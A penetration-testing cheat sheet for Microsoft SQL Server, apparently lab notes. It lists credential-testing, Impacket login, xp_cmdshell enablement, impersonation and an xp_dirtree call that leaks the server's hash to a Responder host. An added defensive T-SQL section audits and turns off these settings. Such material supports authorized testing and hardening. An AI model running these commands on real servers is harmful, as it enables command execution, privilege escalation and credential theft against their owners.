MSSQL

Test access with credentials (domain account with -d, local account with --local-auth)

nxc mssql <ip> -u <user> -p <password> -d <domain>
nxc mssql <ip> -u <user> -p <password> --local-auth

Access using Impacket

mssqlclient.py -windows-auth <domain>/<user>:<password>@<ip>

Inside the Impacket mssqlclient.py shell

enable_xp_cmdshell
xp_cmdshell <cmd>

enum_impersonate
exec_as_user <user>
exec_as_login <login>

# Relay hash with Responder running on Kali
exec xp_dirtree '\\10.10.14.85\whatever',1,1

Inside SQL (plain T-SQL, from any client)

EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXECUTE xp_cmdshell 'whoami';
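
The same settings seen from the defender's side, as an added example that is not part of the original page: T-SQL that reports whether xp_cmdshell is enabled, lists the IMPERSONATE grants that enum_impersonate looks for, and turns xp_cmdshell back off. The bracketed names in the commented REVOKE are placeholders, and the catalog views need a login with permission to view server and database metadata.

```sql
-- Added audit example (not from the original page).

-- 1. Is xp_cmdshell, or the option that exposes it, enabled right now?
SELECT name,
       CAST(value AS int)        AS configured_value,
       CAST(value_in_use AS int) AS running_value
FROM sys.configurations
WHERE name IN (N'show advanced options', N'xp_cmdshell');

-- 2. Server level: which logins may impersonate which other logins?
SELECT grantee.name AS grantee_login,
       target.name  AS can_impersonate_login,
       p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals  AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals  AS target  ON target.principal_id  = p.major_id
WHERE p.class = 101                      -- 101 = server principal
  AND p.permission_name = N'IMPERSONATE'
  AND p.state IN ('G', 'W');             -- GRANT / GRANT WITH GRANT OPTION

-- 3. Database level (run in each database): which users may impersonate which users?
SELECT DB_NAME()    AS database_name,
       grantee.name AS grantee_user,
       target.name  AS can_impersonate_user,
       p.state_desc
FROM sys.database_permissions AS p
JOIN sys.database_principals  AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.database_principals  AS target  ON target.principal_id  = p.major_id
WHERE p.class = 4                        -- 4 = database principal
  AND p.permission_name = N'IMPERSONATE'
  AND p.state IN ('G', 'W');

-- 4. Remediation: disable xp_cmdshell, then hide advanced options again.
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXECUTE sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 5. Remove an unneeded grant found in step 2 (placeholder names):
-- REVOKE IMPERSONATE ON LOGIN::[target_login] FROM [grantee_login];
```

A login that is a member of sysadmin can re-enable xp_cmdshell at will, so step 4 only holds if sysadmin membership and the impersonation paths from steps 2 and 3 are trimmed as well.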
